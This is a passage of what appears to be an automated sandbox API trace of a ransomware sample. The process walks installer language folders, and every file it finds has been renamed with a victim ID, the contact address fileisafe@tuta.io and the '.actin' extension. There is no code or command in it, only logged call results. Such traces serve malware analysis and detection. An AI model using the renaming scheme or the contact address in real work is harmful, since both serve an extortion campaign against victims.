ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c89193d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.136] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.136] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.137] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1030", cAlternateFileName="")) returned 1 [0140.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.138] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c89193d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xdf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc24f10, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x130c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbfef27, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cbfef27, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc24f10, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbfef27, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cbfef27, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc24f10, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.138] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.139] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.139] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1031", cAlternateFileName="")) returned 1 [0140.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9510 [0140.140] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.140] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc24f10, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc24f10, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xe52, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc4b181, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc4b181, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc4b181, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc4b181, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc4b181, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc4b181, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.141] FindClose (in: hFindFile=0xaa9510 | out: hFindFile=0xaa9510) returned 1 [0140.142] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.142] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1032", cAlternateFileName="")) returned 1 [0140.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9510 [0140.143] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.143] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc716cf, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc716cf, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc716cf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x23a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.143] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc716cf, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc716cf, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc978dd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x15212, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.144] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc978dd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc978dd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4c62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.144] FindNextFileW (in: hFindFile=0xaa9510, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc978dd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc978dd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4c62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.144] FindClose (in: hFindFile=0xaa9510 | out: hFindFile=0xaa9510) returned 1 [0140.144] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.145] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1033", cAlternateFileName="")) returned 1 [0140.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.146] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.146] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ccbdb32, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ccbdb32, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ccbdb32, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xd72, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.146] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ccbdb32, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ccbdb32, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cef9e69, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x12ec2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.146] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cead9d5, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cead9d5, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.146] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cead9d5, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cead9d5, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.146] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.147] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.147] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1035", cAlternateFileName="")) returned 1 [0140.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.149] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.149] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cead9d5, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cead9d5, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.149] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ced396f, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ced396f, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x12de2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.149] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ced396f, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ced396f, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.149] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ced396f, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ced396f, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.149] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.150] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.150] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1036", cAlternateFileName="")) returned 1 [0140.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.151] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.151] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cef9e69, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cef9e69, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cef9e69, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xec2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.151] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cef9e69, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cef9e69, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d077395, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x14522, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.151] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf2007e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf2007e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf2007e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.151] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf2007e, 